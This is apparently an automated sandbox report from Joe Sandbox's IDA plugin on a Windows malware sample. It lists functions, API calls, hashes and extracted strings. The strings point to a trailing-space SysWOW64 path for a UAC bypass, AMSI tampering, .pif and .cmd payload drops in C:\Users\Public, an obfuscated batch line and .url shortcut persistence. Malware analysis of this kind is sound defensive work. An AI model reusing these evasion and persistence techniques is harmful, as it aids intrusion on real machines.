MiniDumpWriteDump, xrefs: 0291941E
GetProcessMemoryInfo, xrefs: 0291A2F3
CreateProcessWithLogonW, xrefs: 0291ABE4
UacUninitialize, xrefs: 02913B66, 02913ED4
EnumServicesStatusExW, xrefs: 0291AB8A
EtwEventWriteEx, xrefs: 0291B2C0
CryptSIPGetInfo, xrefs: 02910089
EnumServicesStatusExA, xrefs: 0291AB7B
GetProxyDllInfo, xrefs: 0290FE1F
kernel32, xrefs: 0291AC9B, 0291ACCE, 0291AD01, 0291AD34, 0291AD67, 0291AD9A, 0291ADCD
DlpNotifyPreDragDrop, xrefs: 0291A5F8
wintrust, xrefs: 0290FF0F, 0290FF42, 0290FF75
Ntdll, xrefs: 0291AB26, 0291AB35, 0291AB44, 0291AB53
acS, xrefs: 02914024
DllGetClassObject, xrefs: 0290FDF8, 0291032F, 0291A2C0, 0291AF90
FlushInstructionCache, xrefs: 0291AD83

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: File$Module$AddressHandleProc$AttributesLibraryNamePath$CheckCloseCreateDebuggerDirectoryFreeInetInformationLoadName_OfflineOpenPresentQueryReadRemote
String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 2044571854-184510087
Opcode ID: 0313e5a6383f89ef0e2f90f9917cc4b2fae9b5e9c9455030cf8edda1a55863bd
Instruction ID: 342b822525e12c21afb9556f66750e801810f4060eb5191ebd1c8ce23e0ba442
Opcode Fuzzy Hash: 0313e5a6383f89ef0e2f90f9917cc4b2fae9b5e9c9455030cf8edda1a55863bd
Instruction Fuzzy Hash: A9141D3CB1415D9FDB51EB69D890ADB73F7BB88304F1044E6A609EB254DA31AE81CF42

Function 029182F8 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0290889C: LoadLibraryA.KERNEL32(00000000,00000000,02908983), ref: 029088D0
Part of subcall function 0290889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908983), ref: 029088E0
Part of subcall function 0290889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029088F9
Part of subcall function 0290889C: FreeLibrary.KERNEL32(74AE0000,00000000,0294B388,Function_0000662C,00000004,0294B398,0294B388,000186A3,00000040,0294B39C,74AE0000,00000000,00000000,00000000,00000000,02908983), ref: 02908963

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A3F7DC,02A3F820,OpenSession,0294B37C,0291B9D4,UacScan,0294B37C), ref: 029188B9
ResumeThread.KERNEL32(00000000,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4), ref: 02918F03
CloseHandle.KERNEL32(00000000,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,00000000,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C), ref: 02919082

Part of subcall function 02908818: LoadLibraryW.KERNEL32(bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize,0294B3A4,0290A7F4,UacScan), ref: 0290882C
Part of subcall function 02908818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02908846
Part of subcall function 02908818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize), ref: 02908882

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0294B37C,0291B9D4,UacInitialize,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,UacScan,0294B37C), ref: 02919474

Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,02910714,ScanString,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanString,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,UacInitialize), ref: 028F7E67

Part of subcall function 0290DF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E052), ref: 0290DFBF
Part of subcall function 0290DF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DFF9
Part of subcall function 0290DF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290E026
Part of subcall function 0290DF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290E02F

Part of subcall function 02908204: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0290828E), ref: 02908270

ExitProcess.KERNEL32(00000000,OpenSession,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,Initialize,0294B37C,0291B9D4,00000000,00000000,00000000,ScanString,0294B37C,0291B9D4), ref: 0291B4A5

Strings

VirtualAllocEx, xrefs: 0291ACB7
NtOpenSection, xrefs: 0291B0C2
advapi32, xrefs: 0291940F
ScanBuffer, xrefs: 029186F9, 029189C6, 02918B6C, 02918CF9, 02918E8D, 0291900C, 02919283, 0291937B, 02919797, 02919A70, 02919BE4, 02919E1A, 02919EAC, 0291A1E4, 0291A582, 0291AAB1, 0291B3B7
ScanString, xrefs: 029183FC, 02918668, 0291910F, 02919501, 029198EA, 02919CA6, 02919FA4, 0291A35F, 0291A746, 0291A93D, 0291AEE7
RtlQueryProcessDebugInformation, xrefs: 0291AB4E
spp, xrefs: 0291A2A4, 0291A2D7, 0291AF74
SLGetGenuineInformation, xrefs: 0291A01A
DlpGetArchiveFileTraceInfo, xrefs: 0291A65E
NtQuerySecurityObject, xrefs: 0291B18E
UacScan, xrefs: 029185EC, 02918775, 029188CE, 02918A74, 02918C01, 02918D95, 02918F14, 0291918B, 029195F9, 02919813, 029199F4, 02919B68, 02919D9E, 0291AC0E
MiniDumpReadDumpStream, xrefs: 02919432
SxTracerGetThreadContextDebug, xrefs: 0291A28D, 0291AF5D
SLGetEncryptedPIDEx, xrefs: 0291AFF6
tquery, xrefs: 0291A271
I_QueryTagInformation, xrefs: 0291940A
NtReadVirtualMemory, xrefs: 0291B15B
EnumServicesStatusW, xrefs: 0291AB6C
BCryptVerifySignature, xrefs: 0291A451
CreateProcessW, xrefs: 0291ABB7
dbgcore, xrefs: 02919423, 02919437
SLIsGenuineLocalEx, xrefs: 0291A080
RetailTracerEnable, xrefs: 0291A25A
NtMapViewOfSection, xrefs: 0291B128
NtOpenFile, xrefs: 0291B28D
C:\Windows\System32\, xrefs: 02918883
endpointdlp, xrefs: 0291A60F, 0291A642, 0291A675, 0291A6A8
psapi, xrefs: 0291A30A
NtAlertResumeThread, xrefs: 0291A7BC
CreateProcessA, xrefs: 0291ABA8
UacInitialize, xrefs: 029192FF, 0291971B
DlpGetWebSiteAccess, xrefs: 0291A691
LdrLoadDll, xrefs: 0291B1F4
Advapi, xrefs: 0291AB62, 0291AB71, 0291AB80, 0291AB8F, 0291ABCB, 0291ABDA, 0291ABE9
RtlAllocateHeap, xrefs: 0291A7EF, 0291A855
SLLoadApplicationPolicies, xrefs: 0291A0B3
NtSetSecurityObject, xrefs: 02919446
SLGatherMigrationBlob, xrefs: 0291AFC3
sppwmi, xrefs: 0291AFA7
SLGetSLIDList, xrefs: 0291A04D
psapi, xrefs: 0291AB9E
NtGetWriteWatch, xrefs: 0291B029
NtOpenObjectAuditAlarm, xrefs: 029193F6
EnumProcessModules, xrefs: 0291AB99
EnumServicesStatusA, xrefs: 0291AB5D
NtQueryVirtualMemory, xrefs: 0291B05C
NtWaitForSingleObject, xrefs: 0291A822
VirtualAlloc, xrefs: 0291AC84
NtAccessCheck, xrefs: 0291B1C1
DlpCheckIsCloudSyncApp, xrefs: 0291A62B
mssip32, xrefs: 0291A33D
NtQuerySystemInformation, xrefs: 0291AB21
NtQueryDirectoryFile, xrefs: 0291AB3F
WriteVirtualMemory, xrefs: 0291AD50
CryptSIPVerifyIndirectData, xrefs: 0291A326
NtQueryInformationThread, xrefs: 0291B08F
CreateProcessAsUserA, xrefs: 0291ABC6
bcrypt, xrefs: 0291A468
Initialize, xrefs: 02918380, 02918570, 0291957D, 0291A168, 0291A506, 0291AA35, 0291ADEF, 0291B33B
OpenSession, xrefs: 02918304, 02918478, 029184F4, 029187F1, 0291894A, 02918AF0, 02918C7D, 02918E11, 02918F90, 02919093, 02919207, 02919485, 02919675, 02919966, 02919AEC, 02919D22, 02919F28, 0291A0EC, 0291A3DB, 0291A48A, 0291A6CA, 0291A8C1, 0291A9B9, 0291AE6B, 0291B433
MiniDumpWriteDump, xrefs: 0291941E
NtWriteVirtualMemory, xrefs: 0291B25A
GetProcessMemoryInfo, xrefs: 0291A2F3
CreateProcessWithLogonW, xrefs: 0291ABE4
OpenProcess, xrefs: 0291AD1D
EnumServicesStatusExW, xrefs: 0291AB8A
sppc, xrefs: 0291A031, 0291A064, 0291A097, 0291A0CA, 0291AFDA, 0291B00D
EtwEventWriteEx, xrefs: 0291B2C0
SetUnhandledExceptionFilter, xrefs: 0291ADB6
EnumServicesStatusExA, xrefs: 0291AB7B
EtwEventWrite, xrefs: 0291B2F3
Kernel32, xrefs: 0291ABAD, 0291ABBC, 0291ABF8
CreateProcessAsUserW, xrefs: 0291ABD5, 0291ABF3
ntdll, xrefs: 029193FB, 0291944B, 0291945F, 0291A7D3, 0291A806, 0291A839, 0291A86C, 0291A89F, 0291B040, 0291B073, 0291B0A6, 0291B0D9, 0291B10C, 0291B13F, 0291B172, 0291B1A5, 0291B1D8, 0291B20B, 0291B23E, 0291B271, 0291B2A4, 0291B2D7, 0291B30A
kernel32, xrefs: 0291AC9B, 0291ACCE, 0291AD01, 0291AD34, 0291AD67, 0291AD9A, 0291ADCD
DlpNotifyPreDragDrop, xrefs: 0291A5F8
RtlCreateQueryDebugBuffer, xrefs: 0291A888
NtCreateSection, xrefs: 0291B0F5
VirtualProtect, xrefs: 0291ACEA
Ntdll, xrefs: 0291AB26, 0291AB35, 0291AB44, 0291AB53
DllGetClassObject, xrefs: 0291A2C0, 0291AF90
NtDeviceIoControlFile, xrefs: 0291AB30
NtOpenProcess, xrefs: 0291945A
LdrGetProcedureAddress, xrefs: 0291B227
FlushInstructionCache, xrefs: 0291AD83

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2481178504-1225450241
Opcode ID: c2f5cbcc44be089eb0b7e052b5ac6d19d87844a11a57c45a4e5a687d8691e07a
Instruction ID: ea3c2bb7870834dc25b4aaebf85ffdfdd2dd209b7dde4a9a8a3e100bd5f4abbf
Opcode Fuzzy Hash: c2f5cbcc44be089eb0b7e052b5ac6d19d87844a11a57c45a4e5a687d8691e07a
Instruction Fuzzy Hash: AE430B3DB0415D9FDB51EB69DC809DB73F7BB88304F1044E6A609EB254DA31AE928F42

Function 02914134 Relevance: 38.7, APIs: 2, Strings: 22, Instructions: 2741
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0290889C: LoadLibraryA.KERNEL32(00000000,00000000,02908983), ref: 029088D0
Part of subcall function 0290889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908983), ref: 029088E0
Part of subcall function 0290889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029088F9
Part of subcall function 0290889C: FreeLibrary.KERNEL32(74AE0000,00000000,0294B388,Function_0000662C,00000004,0294B398,0294B388,000186A3,00000040,0294B39C,74AE0000,00000000,00000000,00000000,00000000,02908983), ref: 02908963

Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,02910714,ScanString,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanString,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,UacInitialize), ref: 028F7E67

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,0291BD74), ref: 0291549F

Part of subcall function 0290DEF8: Rt.N(?,?,00000000,0290DF72), ref: 0290DF20
Part of subcall function 0290DEF8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DF72), ref: 0290DF36
Part of subcall function 0290DEF8: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DF72), ref: 0290DF55

Sleep.KERNEL32(000007D0,ScanBuffer,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4), ref: 0291458A

Part of subcall function 0290DF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E052), ref: 0290DFBF
Part of subcall function 0290DF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DFF9
Part of subcall function 0290DF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290E026
Part of subcall function 0290DF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290E02F

Part of subcall function 02908818: LoadLibraryW.KERNEL32(bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize,0294B3A4,0290A7F4,UacScan), ref: 0290882C
Part of subcall function 02908818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02908846
Part of subcall function 02908818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize), ref: 02908882

Part of subcall function 02908784: LoadLibraryW.KERNEL32(amsi), ref: 0290878D
Part of subcall function 02908784: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029087EC

Strings

[InternetShortcut], xrefs: 02916F18
IconIndex=, xrefs: 02916F7D
ScanBuffer, xrefs: 0291430A, 02914515, 02914693, 02914816, 02914892, 02914A49, 02914C53, 02914EB1, 0291515D, 029152AD, 02915413, 029155A8, 02915878, 02915BB2, 02915ECB, 0291624B, 02916584, 02916836, 02916A3B, 02916BA1, 02916D15, 02916D91
C:\\Windows \\SysWOW64\\svchost.pif, xrefs: 02914708
ScanString, xrefs: 02914212, 02914D3D, 02914FE9, 02915780, 0291591A, 02915C5F, 02916023, 029166C2, 02916EA8, 0291701F, 029170D7
URL=file:", xrefs: 02916F27
UacInitialize, xrefs: 02914DB9, 02915065, 029154B0, 02915704, 02915ABA, 02915FA7
NEO.c, xrefs: 02914F32
C:\\Windows \\SysWOW64\\, xrefs: 02914B2E
HotKey=, xrefs: 029170B1
@echo off@%.%e%%c% %h% %o%.oo.% %.%o%, xrefs: 0291438E
C:\Users\Public\alpha.pif, xrefs: 0291561E
UacScan, xrefs: 0291428E, 02914470, 0291459B, 0291471E, 029148EF, 029149CD, 02914B5B, 02915D57, 029162C7, 0291648C, 029167BA, 029168C7, 02916B25, 02916C1D
Initialize, xrefs: 02915A3E, 02915DD3, 029161CF, 02916394, 02916600, 0291673E, 02916943
OpenSession, xrefs: 029143EF, 02914617, 0291479A, 02914BD7, 02914E35, 029150E1, 02915231, 02915397, 0291552C, 029157FC, 02915996, 02915B36, 02915CDB, 02915E4F, 0291609F, 02916153, 02916410, 02916508, 029169BF, 02916C99, 02916E0D, 02916FA3, 02917153
.url, xrefs: 02915F5B
FX.c, xrefs: 029151E3
lld.SLITUTEN, xrefs: 02914B18
C:\Users\Public\, xrefs: 029141B0, 02915F50, 029171C3
UacUninitialize, xrefs: 02914140, 02914951
C:\Users\Public\xkn.pif, xrefs: 02915639
C:\\Users\\Public\\Libraries\\, xrefs: 02916337

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Library$FilePath$FreeLoad$AddressNameName_ProcSleep$AttributesCloseCreateDeleteHandleModuleWrite
String ID: .url$@echo off@%.%e%%c% %h% %o%.oo.% %.%o%$C:\Users\Public\$C:\Users\Public\alpha.pif$C:\Users\Public\xkn.pif$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.pif$FX.c$HotKey=$IconIndex=$Initialize$NEO.c$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 3260000616-127592166
Opcode ID: 73adecf8fd7b3fbc222dbde5cad72bd325e767f480913374e9d3f21a37af2408
Instruction ID: 22b15f325dd6a78abaf103e8fa5d1e529f0873035454006a4d0e706d23e61a1b
Opcode Fuzzy Hash: 73adecf8fd7b3fbc222dbde5cad72bd325e767f480913374e9d3f21a37af2408
Instruction Fuzzy Hash: 73430B3DB1415D9FDB51EB69DC90EDA73B6BB84308F1044E29609EB254DB70AE82CF42

Function 0290E96C Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0290889C: LoadLibraryA.KERNEL32(00000000,00000000,02908983), ref: 029088D0
Part of subcall function 0290889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908983), ref: 029088E0
Part of subcall function 0290889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029088F9
Part of subcall function 0290889C: FreeLibrary.KERNEL32(74AE0000,00000000,0294B388,Function_0000662C,00000004,0294B398,0294B388,000186A3,00000040,0294B39C,74AE0000,00000000,00000000,00000000,00000000,02908983), ref: 02908963

Part of subcall function 02908654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029086E0

Part of subcall function 02908818: LoadLibraryW.KERNEL32(bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize,0294B3A4,0290A7F4,UacScan), ref: 0290882C
Part of subcall function 02908818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02908846
Part of subcall function 02908818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize), ref: 02908882

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,0294B37C,0290F240,OpenSession,0294B37C,0290F240,UacScan,0294B37C,0290F240,ScanBuffer,0294B37C,0290F240,OpenSession,0294B37C), ref: 0290F062
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,0294B37C,0290F240,OpenSession,0294B37C,0290F240,UacScan,0294B37C,0290F240,ScanBuffer,0294B37C,0290F240,OpenSession), ref: 0290F06A
CloseHandle.KERNEL32(000008E4,00000000,00000000,000000FF,ScanString,0294B37C,0290F240,OpenSession,0294B37C,0290F240,UacScan,0294B37C,0290F240,ScanBuffer,0294B37C,0290F240), ref: 0290F073

Strings

ntdll, xrefs: 0290F1B9, 0290F1CA
"C:\Users\Public\NsltarpnF.cmd" , xrefs: 0290EAE5, 0290ECA7
NtSetSecurityObject, xrefs: 0290F1B4
OpenSession, xrefs: 0290EA05, 0290EBAA, 0290ED5A, 0290EE8B, 0290EF82, 0290F0CE
Initialize, xrefs: 0290EE3C, 0290F07F
ScanBuffer, xrefs: 0290EEDA, 0290F11D
AmsiOpenSession, xrefs: 0290EB08
Amsi, xrefs: 0290EB19
UacScan, xrefs: 0290E9AC, 0290EB51, 0290ECE9, 0290EF29, 0290F16C
ScanString, xrefs: 0290EA5E, 0290EC03, 0290EDCB, 0290EFF3
NtOpenProcess, xrefs: 0290F1C5

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Library$Handle$AddressCloseFreeLoadProc$CreateModuleObjectProcessSingleUserWait
String ID: "C:\Users\Public\NsltarpnF.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 1374282660-2666271024
Opcode ID: 32123da5e5b83a23879dfe247ba1496bfe20a9990836253916156f55efa3091e
Instruction ID: be1fe8276decbc4d856c110792120a397c313a1bacb02ecc3012ec16c9cfebe1
Opcode Fuzzy Hash: 32123da5e5b83a23879dfe247ba1496bfe20a9990836253916156f55efa3091e
Instruction Fuzzy Hash: B922CF3CB1015D9FDB50EB68D8C1B8F73BAAF89700F1041A2A705EB694DE70AE458F56

Function 028F1724 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,028F1FC1), ref: 028F17D0
Sleep.KERNEL32(0000000A,00000000,?,028F1FC1), ref: 028F17E6

Strings

!I , xrefs: 028F1830, 028F1875, 028F19B9, 028F1A34

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Sleep
String ID: !I
API String ID: 3472027048-3692765505
Opcode ID: a5903d90bc94ec679fea9d172fc66ed0b22f54f0c750698a6810f08c8a49197f
Instruction ID: 5d8b702a88edcb26042378f65d3d18752f514b832b0192171e730c189b2bcd7e
Opcode Fuzzy Hash: a5903d90bc94ec679fea9d172fc66ed0b22f54f0c750698a6810f08c8a49197f
Instruction Fuzzy Hash: 24B1417EA05341CBCB55CF68D898B66BBE1FB84324F1886AED64DCB385C7709461CB90

Function 02908784 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

